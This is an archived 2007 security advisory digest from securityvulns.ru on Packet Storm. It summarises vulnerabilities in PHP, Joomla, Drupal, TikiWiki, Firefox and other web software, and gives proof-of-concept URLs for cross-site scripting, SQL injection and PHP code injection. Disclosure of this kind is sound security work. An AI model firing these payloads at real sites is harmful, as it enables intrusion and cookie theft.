exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

russian-multi.txt

russian-multi.txt
Posted Oct 11, 2007
Site securityvulns.ru

Multiple vulnerabilities from Russian blogs have been aggregated. These findings discuss vulnerabilities in PHP versions 4 and 5, WordPress MultiUser version 1.0, ActiveKB version 1.5, Joomla! versions 1.0.13 and below, ActiveKB NX version 2.5.4, UMI CMS, Nucleus, Stride CMS versions 1.0, and more. Exploitation details provided.

tags | exploit, php, vulnerability
SHA-256 | fb869b5b3ce55625ab55a47de8fcf2451573a9cbadef41728be9a23809d9f5e8

russian-multi.txt

Change Mirror Download
Dear bugtraq@securityfocus.com,

Vulnerabilities reported by different Russian speaking authors to
http://securityvulns.ru

1. Elekt(Antichat.ru) reports protection bypass vulnerability in PHP 4
and 5.

disable_functions feature can be bypassed by using functions alias. A
list of aliases is given in http://php.net/aliases/. For example,
ini_alter() may be used instead of ini_set() and vice versa.

SecurityVulns issue: http://securityvulns.com/news/PHP/alias-pb.html
Original message (in Russian): http://securityvulns.ru/Sdocument67.html

2. MustLive reports Crossite-Cripting vulnerability in WordPress
MultiUser 1.0

XSS is possible via Username form field.

Additional information (in Ukranian): http://websecurity.com.ua/1269/
Original message (in Russian): http://securityvulns.ru/Rdocument875.html

3. durito [NGH Group] reports multiple SQL injections in ActiveKB 1.5

Example:

http://www.example.com/activekb/index.php?ToDo=browse&catId=[SQL]
http://www.example.com/activekb/admin/index.php?ToDo=hideQuestion&questId=[SQL]

Original message (in Russian): http://securityvulns.ru/Rdocument901.html

4. MustLive reports Cross-Site Scripting vulnerability in Joomla! <= 1.0.13

An example of vulnerability is

http://site/index.php?option=com_search&searchword=';alert('XSS')//

Additional information (in Ukranian): http://websecurity.com.ua/1203/
Original message (in Russian): http://securityvulns.ru/Rdocument919.html

5. durito [NGH Group] reports crossite-scripting vulnerability in
ActiveKB NX 2.5.4

Example: http://www.example.com/activekb/ActiveKB/?page=[XXS]

Original message (in Russian): http://securityvulns.ru/Rdocument956.html

6. "noname indexed" reports vulnerability in UMI CMS (http://uni-cms.ru)

Vulnerability example:

http://example.com/search/search_do/?search_string=%22%20onmouseover=%22javacript:alert();

Original message (in Russian): http://securityvulns.ru/Rdocument957.html

7. MustLive reports cross-site scripting vulnerability in Nucleus.

Example: http://site/index.php?blogid=1&archive=2007-01-01%3Cscript%3Ealert(document.cookie)%3C/script%3E

Additional information (in Ukranian): http://websecurity.com.ua/1347/
Original message (in Russian): http://securityvulns.ru/Sdocument3.html

8. durito [NGH Group] reports

8.1 multiple SQL injections in Stride v1.0 Content Management System,
Merchant, Courses. Examples:

Content Management System

http://www.example.com/main.php?p=[SQL]

Merchant

http://www.example.com/shop.php?cmd=sto&id=[SQL]

Courses

http://www.example.com/detail.php?course=[SQL]
http://www.example.com/detail.php?provider=[SQL]

8.2 Information leak (FTP access account) with MyFTPUploader within
same applications. Example:

http://www.example.com/include/imageupload.js

contains

document.writeln('<param name="uploadDirectory" value="/public_html/dbimages/process">');
document.writeln('<param name="successURL" value="admin_imagemulti.php?action=process">');
document.writeln('<param name="host" value="www.target.com">');
document.writeln('<param name="userName" value="target">');
document.writeln('<param name="password" value="target">');

8.3 Default administrator's password for same applications.

Original message (in Russian): http://securityvulns.ru/Sdocument4.html

9. MustLive reports multiple crossite scripting vulnerabilities in
Site-Up <= 2.64

Via "search" and "search mask" fields of http://site/siteuprus/index.cgi:

Additional information (in Ukranian): http://websecurity.com.ua/1210/
Original message: (in Russian): http://securityvulns.ru/Sdocument12.html

10. MustLive reports crossite scripting in Google Search Appliance.

Example: http://site/search?ie=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&site=x&output=xml_no_dtd'&client=x&proxystylesheet=x'

Additional information (in Ukranian): http://websecurity.com.ua/1368/
Original message (in Russian): http://securityvulns.ru/Sdocument32.html

10. MustLive reports crossite scripting in PRO-search

Example: http://site/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Additional information (in Ukranian): http://websecurity.com.ua/1224/
Original message (in Russian): http://securityvulns.ru/Sdocument68.html

10. MustLive reports multiple vulnerabilities in Urchin Web Analytics
5.7.03.
In addition to re-discovered XSS vulnerability, there is also
authentication bypass (access without username/password).

Example: http://site:10000/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301&bd=20070703&ed=20070703&dt=4&gtype=5

Additional information (in Ukranian): http://websecurity.com.ua/1283/
Original message: (in Russian): http://securityvulns.ru/Sdocument90.html

11. MustLive reports crossite scripting vulnerability in Mozilla Firefox
<= 2.0 with gopher: protocol URL if UTF-7 if page content is displayed as
UTF-7. Examples:

For Firefox before 2.0:

gopher:///1+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-

gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-

For Firefox 2.0:

gopher:///1+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-

gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-

According to author, it's possible to execute script in both local zone
and context of gopher site.

12. ShAnKaR reports PHP Zend Hash vulnerability exploitation vector
with Drupal <= 5.2.

Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();

Original message (in Russian): http://securityvulns.ru/Sdocument137.html

13. ShAnKaR reports PHP injection vulnerability in TikiWiki 1.9.8.

Example: http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=

Original message (in Russian):

http://securityvulns.ru/Sdocument162.html

Also, multiple vulnerabilities were reported in English by

:: iNs @ uNkn0wn.eu :: http://securityvulns.com/source26994.html
and
r0t: http://securityvulns.com/source12948.html












--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close